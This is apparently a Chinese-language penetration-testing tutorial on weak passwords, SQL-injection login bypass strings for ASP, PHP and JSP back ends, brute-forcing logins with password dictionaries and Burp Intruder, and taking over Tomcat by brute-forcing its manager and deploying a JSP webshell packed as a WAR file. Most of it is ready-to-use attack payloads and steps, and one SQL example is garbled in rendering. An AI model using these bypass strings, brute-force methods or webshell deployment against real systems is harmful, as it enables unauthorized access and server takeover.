➢弱口令
弱口令(weak password) 没有严格和准确的定义,通常认为容易被别人(他们有可能对你很了解)猜测到或被破解工具破解的口令均为弱口令。弱口令指的是仅包含简单数字和字母的口令。
➢示例
简单数字组合: 000000 111111 11111111 112233 123123
顺序字符组合:abcdef abcabc abc123 a1b2c3 aaa111
临近字符组合:123qwe Qwerty qweasd
特殊含义组合:admin password p@ssword passwd Iloveyou 514
➢万能密码
登录后台时,接收用户输入的Userid和Password数据,并分别赋值给user和pwd,然后再用以下语句进行验证
select * from user where username="&user&" and password="&pwd&"
➢示例
假设数据库中存放用户信息的表是admin,其中存放用户名的字段是username,存放密码的字段是password,在用户验证页面中用来接收用户所输入的用户名和密码的变量也分别是user和pwd,当用户在用户验证页面输入用户名和密码后,会提交给如下的语句进行处理:
select * from admin where username = ‘ u s e r r n a m e ′ a n d p a s s w o r d = ′ userrname' and password = ' userrname′andpassword=′password’这样,当用户输入用户名’or’’ = ‘时,相应的语句就变成了
select * from admin where username = ‘’ or ‘’ =’’ and password = ‘’
在这个语句中,where后面所指定的条件永久成立,因而就可以绕过身份验证,也就成为了所谓的万能密码。
➢Asp/aspx万能密码
1: "or “a”="a
2: ')or(‘a’=‘a
3:or 1=1–
4:‘or 1=1–
5:a’or’ 1=1–
6: “or 1=1–
7:‘or’a’=‘a
8: “or”="a’='a
9:'or”=’
10:‘or’=‘or’
➢Php/jsp万能密码
‘or’=‘or’
‘or 1=1/* 字符型 GPC是否开都可以使用
User: something
Pass: ’ OR ‘1’=‘1
jsp 万能密码
1’or’1’=‘1
admin’ OR 1=1/*
用户名:admin 系统存在这个用户的时候 才用得上
密码:1’or’1’='1
➢暴力破解
指用枚举的方式来爆破用户信息。具体的流程是用事先收集好的数据集成一个字典,然后用字典不断进行枚举,直到枚举成功
➢密码字典收集
1、网上现成字典
/k8gege/PasswordDic
2、根据网站特性自己生成,比如:
网站域名、网站名字、页面内容(出现的人名、手机号、QQ号等)
3、自己收集(以往项目中经常出现、好用的)
➢不含验证码后台
➢不失效的验证码
➢phpmyadmin/tomcat
➢各类协议
FTP、SSH、RDP、MYSQL等
➢Tomcat密码组成
Username:password base64加密
➢ Intruder(Target)
➢ Intruder(Positions)
➢ Intruder(Payloads)
Custom iterator
➢Tomcat后台爆破
➢部署War包
制作方法:将jsp马压缩成zip文件,再将zip后缀改为war
cmd:jar –cvf *.war *.jsp
➢Getshell
http://ip:port/warname/filename.jsp
